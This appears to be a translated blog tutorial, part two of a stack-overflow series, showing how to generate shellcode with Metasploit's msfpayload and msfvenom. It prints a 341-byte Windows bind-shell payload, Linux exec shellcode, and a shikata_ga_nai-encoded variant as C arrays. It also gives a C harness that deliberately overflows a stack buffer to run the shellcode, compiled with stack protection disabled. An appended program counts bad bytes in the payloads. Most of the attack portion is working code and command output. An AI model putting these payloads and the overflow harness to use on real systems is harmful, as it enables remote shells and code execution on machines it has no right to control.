The basic stack overflow article showed that a very important issue in real-world attacks is shellcode generation.
Using the tools provided by Metasploit you can easily generate shellcode, which can then be validated with the code from the first article.
Let's start with how to generate shellcode (everything below was generated under BT5).
The examples follow the reference at: http://www.offensive-security.com/metasploit-unleashed/Msfpayload
To list the available payloads:
[email protected]:~# msfpayload -l

Framework Payloads (251 total)
==============================

    Name                               Description
    ----                               -----------
    aix/ppc/shell_bind_tcp             Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port            Spawn a shell on an established connection
    aix/ppc/shell_interact             Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp          Connect back to attacker and spawn a command shell
    bsd/sparc/shell_bind_tcp           Listen for a connection and spawn a command shell
    ...snip...
    windows/x64/shell/bind_tcp         Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)
    windows/x64/shell/reverse_tcp      Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged)
    windows/x64/shell_bind_tcp         Listen for a connection and spawn a command shell (Windows x64)
    windows/x64/shell_reverse_tcp      Connect back to attacker and spawn a command shell (Windows x64)
    windows/x64/vncinject/bind_tcp     Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
    windows/x64/vncinject/reverse_tcp  Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
To view the options of a specific payload:
[email protected]:~# msfpayload windows/shell_bind_tcp O

       Name: Windows Command Shell, Bind TCP Inline
     Module: payload/windows/shell_bind_tcp
    Version: 14774
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 341
       Rank: Normal

Provided by:
  vlad902
  sf

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LPORT     4444             yes       The listen port
RHOST                      no        The target address

Description:
  Listen for a connection and spawn a command shell
Finally, generate the shellcode. Continuing the example above, this produces the shellcode as a C array:
[email protected]:~# msfpayload windows/shell_bind_tcp LPORT=7777 C
/*
 * windows/shell_bind_tcp - 341 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LPORT=7777, RHOST=, EXITFUNC=process,
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x31\xdb\x53\x68\x02\x00\x1e\x61\x89\xe6\x6a\x10\x56\x57\x68"
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";
Since we are working in a Linux environment we need Linux shellcode instead, so we use the linux/x86/exec payload:
[email protected]:~# msfpayload linux/x86/exec CMD=ls C
/*
 * linux/x86/exec - 38 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependSetresuid=false,
 * PrependSetreuid=false, PrependSetuid=false,
 * PrependChrootBreak=false, AppendExit=false, CMD=ls
 */
unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c"
"\x73\x00\x57\x53\x89\xe1\xcd\x80";
OK, now we can verify it with the shell.c from the previous section.
 1  #include <unistd.h>
 2  #include <string.h>                 /* for memcpy() */
 3  unsigned char large_string[128];    /* array size lost in extraction; 128 assumed, as in the classic shell.c */
 4  /*
 5   * linux/x86/exec - 38 bytes
 6   * http://www.metasploit.com
 7   * VERBOSE=false, PrependSetresuid=false,
 8   * PrependSetreuid=false, PrependSetuid=false,
 9   * PrependChrootBreak=false, AppendExit=false, CMD=ls
10   */
11  unsigned char shellcode[] =
12  "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
13  "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c"
14  "\x73\x00\x57\x53\x89\xe1\xcd\x80";
15
16  void main() {
17    char buffer[96];                  /* size lost in extraction; 96 assumed, as in the classic shell.c */
18    int i;
19    long *long_ptr = (long *) large_string;
20    for (i = 0; i < sizeof(large_string) / sizeof(int); i++)
21      *(long_ptr + i) = (int) buffer;  /* fill with the buffer address (32-bit x86: int, long and pointer are 4 bytes) */
22
23    for (i = 0; i < sizeof(shellcode); i++)
24      large_string[i] = shellcode[i];  /* put the shellcode at the start of large_string */
25    memcpy(buffer, large_string, sizeof(large_string));   /* deliberately copies 128 bytes into a 96-byte buffer */
26  }
Note that on line 25 I replaced strcpy with memcpy, because the generated shellcode contains a few 0x00 bytes, and strcpy would stop copying at the first of them.
Compile and run it with the same command as before to validate it:
gcc -fno-stack-protector -z execstack -g -o shell shell.c
[email protected]:/mnt/hgfs/r/stack$ ./shell
To avoid 0x00 bytes in the shellcode you can use msfvenom with an encoder and a bad-character list, taking the example above:
[email protected]:~# msfvenom -p linux/x86/exec CMD=ls -e x86/shikata_ga_nai -b '\x00' -f c
[*] x86/shikata_ga_nai succeeded with size 65 (iteration=1)

unsigned char buf[] =
"\xdb\xd6\xd9\x74\x24\xf4\xbb\xe3\xa4\x6b\x7e\x58\x2b\xc9\xb1"
"\x0a\x83\xc0\x04\x31\x58\x15\x03\x58\x15\x01\x51\x01\x75\x9d"
"\x03\x84\xef\x75\x19\x4a\x79\x62\x09\xa3\x0a\x04\xca\xd3\xc3"
"\xb6\xa3\x4d\x95\xd5\x66\x7a\xa6\x19\x87\x7a\xc5\x6a\x87\x2d"
"\x46\x05\x66\x1c\xe8";
But there is a problem: the generated shellcode cannot be exploited; it raises an illegal instruction and causes a core dump, for an unknown reason.
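The strcpy-versus-memcpy point above and the -b '\x00' encoding step both come down to the same check: which bytes of a payload a copy routine will actually deliver. This added example (not code from the post) embeds copies of the two linux/x86/exec buffers shown above as its input, counts the bytes that fall in a bad-byte set, and reports how much strcpy() would copy before stopping; the set {0x00, 0x0a} and the helper names are my own choice.

```c
#include <stdio.h>
#include <stddef.h>

/* Copies of the two linux/x86/exec payloads shown above, embedded as test
 * input: 38 raw bytes, and 65 bytes after x86/shikata_ga_nai with -b '\x00'. */
static const unsigned char raw_exec[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c"
"\x73\x00\x57\x53\x89\xe1\xcd\x80";
static const unsigned char encoded_exec[] =
"\xdb\xd6\xd9\x74\x24\xf4\xbb\xe3\xa4\x6b\x7e\x58\x2b\xc9\xb1"
"\x0a\x83\xc0\x04\x31\x58\x15\x03\x58\x15\x01\x51\x01\x75\x9d"
"\x03\x84\xef\x75\x19\x4a\x79\x62\x09\xa3\x0a\x04\xca\xd3\xc3"
"\xb6\xa3\x4d\x95\xd5\x66\x7a\xa6\x19\x87\x7a\xc5\x6a\x87\x2d"
"\x46\x05\x66\x1c\xe8";
#define PAYLOAD_LEN(p) (sizeof(p) - 1)   /* drop the string literal's trailing NUL */

/* Assumed bad-byte set: NUL ends a strcpy()-style copy, '\n' ends a line read. */
static const unsigned char BAD[] = { 0x00, 0x0a };

/* Number of bytes in buf[0..len) that belong to the bad set. */
size_t bad_bytes_in(const unsigned char *buf, size_t len)
{
    size_t i, j, n = 0;
    for (i = 0; i < len; i++)
        for (j = 0; j < sizeof BAD; j++)
            if (buf[i] == BAD[j]) { n++; break; }
    return n;
}

/* How many bytes strcpy() would copy before stopping at the first NUL. */
size_t strcpy_would_copy(const unsigned char *buf, size_t len)
{
    size_t i;
    for (i = 0; i < len && buf[i] != 0; i++)
        ;
    return i;
}

int main(void)
{
    printf("raw exec:     %zu bad bytes, strcpy would copy %zu of %zu\n",
           bad_bytes_in(raw_exec, PAYLOAD_LEN(raw_exec)),
           strcpy_would_copy(raw_exec, PAYLOAD_LEN(raw_exec)), PAYLOAD_LEN(raw_exec));
    printf("encoded exec: %zu bad bytes, strcpy would copy %zu of %zu\n",
           bad_bytes_in(encoded_exec, PAYLOAD_LEN(encoded_exec)),
           strcpy_would_copy(encoded_exec, PAYLOAD_LEN(encoded_exec)), PAYLOAD_LEN(encoded_exec));
    return 0;
}
```

The raw payload has five NUL bytes and strcpy would deliver only its first 15 bytes; the encoded payload has no NULs, but it still contains two 0x0a bytes, which is why the bad-character list has to match the copy routine that actually handles the input.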
Stack overflow attack using Metasploit (2)